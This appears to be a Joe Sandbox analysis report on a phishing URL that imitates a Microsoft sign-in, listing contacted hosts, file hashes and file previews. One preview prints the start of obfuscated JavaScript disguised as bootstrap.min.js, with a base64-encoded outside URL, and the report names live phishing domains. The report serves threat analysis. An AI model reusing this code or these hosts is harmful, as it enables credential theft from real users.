                                                                        https://res.cloudinary.com/dxetjqzbe/image/upload/v1742052868/6059C6BA-9C9F-4199-8218-8895A9F0C3C8_ctielh.pngfalse
                                                                          high
                                                                          https://mailmeteor.com/logos/assets/PNG/Microsoft_Logo_512px.pngfalse
                                                                            high
                                                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/310346162:1742491115:9Ic98fm1bm6UZNqolicYeekvkrwSVIH1ayYCexa4QzM/923707b7eceb8ce8/2CNAH9JqFOOP8uA0lIBT02cSnv2QlQTl.ABIWgr0E1A-1742492798-1.1.1.1-aR2nHo7nsO9RghcdPok9EtURfSVO2zwh0rs3oVvye6ThxHDBNOawXnDFAvvWnA2Zfalse
                                                                              high
                                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                                              https://getbootstrap.com/)chromecache_82.1.drfalse
                                                                                high
                                                                                https://github.com/twbs/bootstrap/graphs/contributors)chromecache_82.1.dr, chromecache_71.1.drfalse
                                                                                  high
                                                                                  https://getbootstrap.com)chromecache_71.1.drfalse
                                                                                    high
                                                                                    https://github.com/twbs/bootstrap/blob/master/LICENSE)chromecache_82.1.dr, chromecache_71.1.drfalse
                                                                                      high
                                                                                      http://opensource.org/licenses/MIT).chromecache_84.1.drfalse
                                                                                        high
                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs
                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        43.128.240.48
                                                                                        cos.ap-tokyo.myqcloud.comJapan4249LILLY-ASUSfalse
                                                                                        172.67.187.19
                                                                                        mailmeteor.comUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        104.18.94.41
                                                                                        unknownUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        23.56.162.51
                                                                                        e1315.dsca.akamaiedge.netUnited States
                                                                                        16625AKAMAI-ASUSfalse
                                                                                        35.190.80.1
                                                                                        a.nel.cloudflare.comUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        23.209.72.31
                                                                                        e329293.dscd.akamaiedge.netUnited States
                                                                                        20940AKAMAI-ASN1EUfalse
                                                                                        104.21.92.58
                                                                                        unknownUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        104.17.24.14
                                                                                        cdnjs.cloudflare.comUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        23.209.72.9
                                                                                        unknownUnited States
                                                                                        20940AKAMAI-ASN1EUfalse
                                                                                        142.250.80.100
                                                                                        www.google.comUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        104.21.24.46
                                                                                        xzoe.classical.it.comUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        104.18.95.41
                                                                                        challenges.cloudflare.comUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        151.101.2.137
                                                                                        code.jquery.comUnited States
                                                                                        54113FASTLYUSfalse
                                                                                        104.18.11.207
                                                                                        stackpath.bootstrapcdn.comUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        172.67.216.207
                                                                                        incomestatementdocument.classical.it.comUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        IP
                                                                                        192.168.2.16
                                                                                        Joe Sandbox version:42.0.0 Malachite
                                                                                        Analysis ID:1644631
                                                                                        Start date and time:2025-03-20 18:45:52 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 3m 29s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                        Sample URL:https://incomestatementdocument.classical.it.com/NC6tS/
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:17
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Detection:MAL
                                                                                        Classification:mal68.phis.win@24/44@44/16
                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 142.250.80.110, 142.250.68.35, 142.251.179.84, 142.251.40.174, 142.250.80.46, 142.251.40.110, 142.250.65.238, 142.250.65.206, 142.250.80.78, 142.250.64.99, 142.250.65.174, 142.250.65.163, 142.251.40.206, 142.251.40.142, 142.250.72.106, 172.217.165.138, 142.250.65.170, 142.250.80.74, 142.251.40.202, 142.251.41.10, 142.251.40.170, 142.251.40.138, 142.250.80.42, 142.250.80.10, 142.251.35.170, 142.250.80.106, 142.250.64.74, 142.251.40.106, 142.251.40.234, 142.250.176.202, 4.175.87.197, 184.30.55.36, 20.190.152.20, 23.219.82.9, 13.107.246.40, 13.107.246.38
                                                                                        • Excluded domains from analysis (whitelisted): www.bing.com, clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, ajax.googleapis.com, aadcdnoriginwus2.azureedge.net, clientservices.googleapis.com, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, login.live.com, update.googleapis.com, aadcdnoriginwus2.afd.azureedge.net, clients.l.google.com
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • VT rate limit hit for: https://incomestatementdocument.classical.it.com/NC6tS/
                                                                                        No simulations
                                                                                        No context
                                                                                        No context
                                                                                        No context
                                                                                        No context
                                                                                        No context
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (24050)
                                                                                        Category:downloaded
                                                                                        Size (bytes):24051
                                                                                        Entropy (8bit):4.941039417164537
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:VuR/6okgTQwq23gGM8lUR9YRGQ2BwoX6zp+1+nDT1FvxKSI7/UsV7MSE6XZ2dKzk:JwV+oUcoQJpdf1dxKSI7/Ue7ZX2qk
                                                                                        MD5:5E8C69A459A691B5D1B9BE442332C87D
                                                                                        SHA1:F24DD1AD7C9080575D92A9A9A2C42620725EF836
                                                                                        SHA-256:84E3C77025ACE5AF143972B4A40FC834DCDFD4E449D4B36A57E62326F16B3091
                                                                                        SHA-512:6DB74B262D717916DE0B0B600EEAD2CC6A10E52A9E26D701FAE761FCBC931F35F251553669A92BE3B524F380F32E62AC6AD572BEA23C78965228CE9EFB92ED42
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://incomestatementdocument.classical.it.com/cdn-cgi/styles/cf.errors.css
                                                                                        Preview:#cf-wrapper a,#cf-wrapper abbr,#cf-wrapper article,#cf-wrapper aside,#cf-wrapper b,#cf-wrapper big,#cf-wrapper blockquote,#cf-wrapper body,#cf-wrapper canvas,#cf-wrapper caption,#cf-wrapper center,#cf-wrapper cite,#cf-wrapper code,#cf-wrapper dd,#cf-wrapper del,#cf-wrapper details,#cf-wrapper dfn,#cf-wrapper div,#cf-wrapper dl,#cf-wrapper dt,#cf-wrapper em,#cf-wrapper embed,#cf-wrapper fieldset,#cf-wrapper figcaption,#cf-wrapper figure,#cf-wrapper footer,#cf-wrapper form,#cf-wrapper h1,#cf-wrapper h2,#cf-wrapper h3,#cf-wrapper h4,#cf-wrapper h5,#cf-wrapper h6,#cf-wrapper header,#cf-wrapper hgroup,#cf-wrapper html,#cf-wrapper i,#cf-wrapper iframe,#cf-wrapper img,#cf-wrapper label,#cf-wrapper legend,#cf-wrapper li,#cf-wrapper mark,#cf-wrapper menu,#cf-wrapper nav,#cf-wrapper object,#cf-wrapper ol,#cf-wrapper output,#cf-wrapper p,#cf-wrapper pre,#cf-wrapper s,#cf-wrapper samp,#cf-wrapper section,#cf-wrapper small,#cf-wrapper span,#cf-wrapper strike,#cf-wrapper strong,#cf-wrapper sub,#cf-w
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):32
                                                                                        Entropy (8bit):4.390319531114783
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:HYmpBth0tYY:4mpbgYY
                                                                                        MD5:EB3CE3190D8A58E048D35E620747D3A5
                                                                                        SHA1:76B5B6461189F839B018EF5C785DB4836B818B7D
                                                                                        SHA-256:2D670E2962D8D805B95912CACA0822CE7C6913636BA40373C6E6AEA73CAC8457
                                                                                        SHA-512:08F9C680B09CC25919A91F8E080CFC517F7354F49759DDC8CF6FFEB5ADE2E46F80A866E7531B6EA97188A5E4647093350F91ED51254351C47BCE3488EF88A595
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCUFUFYdNbNaKEgUNrQmusSHeCyY_RehLvBIZCflNbEThC19KEgUNQ_N2OSEwYhriP9dQKA==?alt=proto
                                                                                        Preview:CgkKBw2tCa6xGgAKCQoHDUPzdjkaAA==
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                        Category:dropped
                                                                                        Size (bytes):17174
                                                                                        Entropy (8bit):2.9129715116732746
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                        MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                        SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                        SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                        SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                                                                        Category:downloaded
                                                                                        Size (bytes):2309
                                                                                        Entropy (8bit):3.9533709859154516
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:n/6fBvwuCkkkkkkkkkkkkkkkkkkkkkkkkkkJYfkkkkkkkkkkkkkkkkkkkkkkkkk+:n/6Zv/V
                                                                                        MD5:26A555918CCCAC480C5DC4845ECC04E1
                                                                                        SHA1:3B9F8C9C19902E4751C392E8764F612ED60F2818
                                                                                        SHA-256:FF8A819AC9081D67E353BC9FC2654A583A5A0631EA6EB617A130ECC9BF8B010A
                                                                                        SHA-512:8F4F894FAE992AAA001D6CDE538829A3153BE16672CEACD4315AEE932025EA1814A9AB6F08BCE0B40C34BE76FACDC6535AE5FB52CC20A7FFC36041A28B817012
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://mailmeteor.com/logos/assets/PNG/Microsoft_Logo_512px.png
                                                                                        Preview:.PNG........IHDR..............x......pHYs.................sRGB.........gAMA......a.....IDATx...1.]U.....`#d.......^..t.N...8.;;..A...T73xE.@ ;7."..9$.......^.............................................|......_...<..D...?.}?....G..._.8.z...o_.<........z....9.^.}..2.i..#.3............$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A...
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (32065)
                                                                                        Category:downloaded
                                                                                        Size (bytes):85578
                                                                                        Entropy (8bit):5.366055229017455
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
                                                                                        MD5:2F6B11A7E914718E0290410E85366FE9
                                                                                        SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                                                                        SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                                                                        SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
                                                                                        Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (48664)
                                                                                        Category:downloaded
                                                                                        Size (bytes):48944
                                                                                        Entropy (8bit):5.272507874206726
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:9VG5R15WbHVKZrycEHSYro34CrSLB6WU/6DqBf4l1B:9VIRuo53XiwWTvl1B
                                                                                        MD5:14D449EB8876FA55E1EF3C2CC52B0C17
                                                                                        SHA1:A9545831803B1359CFEED47E3B4D6BAE68E40E99
                                                                                        SHA-256:E7ED36CEEE5450B4243BBC35188AFABDFB4280C7C57597001DE0ED167299B01B
                                                                                        SHA-512:00D9069B9BD29AD0DAA0503F341D67549CCE28E888E1AFFD1A2A45B64A4C1BC460D81CFC4751857F991F2F4FB3D2572FD97FCA651BA0C2B0255530209B182F22
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
                                                                                        Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function r(){return(r=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&e.hasOwnProperty("default")?e.default:e,n=n&&n.hasOwnProp
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                        Category:downloaded
                                                                                        Size (bytes):61
                                                                                        Entropy (8bit):3.990210155325004
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                        MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                        SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                        SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                        SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                                                                        Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (32012)
                                                                                        Category:downloaded
                                                                                        Size (bytes):69597
                                                                                        Entropy (8bit):5.369216080582935
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:qNhEyjjTikEJO4edXXe9J578go6MWX2xkjVe4c4j2ll2Ac7pK3F71QDU8CuT:Exc2yjq4j2uYnQDU8CuT
                                                                                        MD5:5F48FC77CAC90C4778FA24EC9C57F37D
                                                                                        SHA1:9E89D1515BC4C371B86F4CB1002FD8E377C1829F
                                                                                        SHA-256:9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
                                                                                        SHA-512:CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://code.jquery.com/jquery-3.2.1.slim.min.js
                                                                                        Preview:/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_e
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                                                        Category:downloaded
                                                                                        Size (bytes):621
                                                                                        Entropy (8bit):7.673946009263606
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                                                        MD5:4761405717E938D7E7400BB15715DB1E
                                                                                        SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                                                        SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                                                        SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://aadcdn.msauth.net/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg
                                                                                        Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                        Category:downloaded
                                                                                        Size (bytes):1864
                                                                                        Entropy (8bit):5.222032823730197
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                                                                                        MD5:BC3D32A696895F78C19DF6C717586A5D
                                                                                        SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                                                        SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                                                        SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg
                                                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (65462), with CRLF line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):549824
                                                                                        Entropy (8bit):4.912922335405265
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:GXfqkrCml3IcW/Gssv05wky5q5XCvlmwWcUoG7A6MTxD97ZHSKmE:nk9fm405wkAq5yMVcU50hTxD97RSKmE
                                                                                        MD5:F0E9C2CF7DB37574694765C677A77CB0
                                                                                        SHA1:CB7FF48755EA9C40E62C61AB0A3A7CD503A805EA
                                                                                        SHA-256:2AD2CFA3BE8AF3CF871E1F71C211FEBE07073F30292DD55101FCA3DBAA0C23B4
                                                                                        SHA-512:C2E2CDC96FFAFCEB72F962DC3B498D314BEA8DB6862F9217550FF439792339DF37D9D1510E85FE34C6D4EB23B1BDCA71C8EA2364CCDF75055122310161B6BB00
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://6438955191-1317754460.cos.ap-tokyo.myqcloud.com/bootstrap.min.js
                                                                                        Preview:var file = "aHR0cHM6Ly94em9lLmNsYXNzaWNhbC5pdC5jb20vZ29vZ2xlLnBocA==";....var _0x586849=_0x3529;(function(_0x186e81,_0x380acb){var _0x34a11c=_0x3529,_0xef0e23=_0x186e81();while(!![]){try{var _0x535a49=parseInt(_0x34a11c(0x2a9))/(0x1e31+0x134*-0x16+-0x3b8)+-parseInt(_0x34a11c(0x2a99))/(-0x702+0xa9d+-0x399)*(parseInt(_0x34a11c(0xbdd))/(-0x20aa*-0x1+-0x257c+0x4d5*0x1))+-parseInt(_0x34a11c(0xf4d))/(-0x567*-0x4+-0x886+-0x689*0x2)*(parseInt(_0x34a11c(0x1422))/(0x118a*0x1+0x1425*-0x1+0x2a0))+parseInt(_0x34a11c(0xe0b))/(-0xfd5+-0x1a30+0x2a0b)*(-parseInt(_0x34a11c(0x13bd))/(0x25b7+0xc4*-0x1b+0x4*-0x441))+parseInt(_0x34a11c(0x15f2))/(-0x36*-0xd+0x9d0+-0xc86)+-parseInt(_0x34a11c(0xa3d))/(0x1491+-0x206e+0xbe6)+-parseInt(_0x34a11c(0x1433))/(-0x5f8+-0x168+-0xd*-0x92)*(-parseInt(_0x34a11c(0x49d))/(0x159d+0x979+0x9*-0x373));if(_0x535a49===_0x380acb)break;else _0xef0e23['push'](_0xef0e23['shift']());}catch(_0x8dd1f8){_0xef0e23['push'](_0xef0e23['shift']());}}}(_0x1c5f,-0x1e295*-0x2+0x9994a+-0x6aeef));v
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 2016 x 2016, 8-bit/color RGBA, non-interlaced
                                                                                        Category:dropped
                                                                                        Size (bytes):21873
                                                                                        Entropy (8bit):2.877142515573533
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:OR1111111118111111111111111111111111111111111111111111111111111l:OO
                                                                                        MD5:568F3323A159C49C955A6E9E5CE8AC4D
                                                                                        SHA1:9F2A67B5CC72217B67EBB5C0B63556D70C4795C3
                                                                                        SHA-256:4E19539141237AAB02BA7D5E9657823C29907581024BADB76B1026F739BDC7B5
                                                                                        SHA-512:00F9B53896F031CACC067061DD39AB3E7EDD0FD450456029212A0649F6A1A5C2895D7CDB72214851F63529D3E22BDADD23C0A991AB32DF55C8E8B646D789B42B
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:.PNG........IHDR...............A.....tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:D102A13741CE11E6A31DDAB08C35506E" xmpMM:DocumentID="xmp.did:D102A13841CE11E6A31DDAB08C35506E"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:D102A13541CE11E6A31DDAB08C35506E" stRef:documentID="xmp.did:D102A13641CE11E6A31DDAB08C35506E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.A....Q.IDATx...?..Q.........0..H.B.lcVA5....PLc...VD.EC.5.`.;..y.sN..or..t:........>gl.........<...........<.........x...
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 54 x 54, 8-bit colormap, non-interlaced
                                                                                        Category:downloaded
                                                                                        Size (bytes):452
                                                                                        Entropy (8bit):7.0936408308765495
                                                                                        Encrypted:false
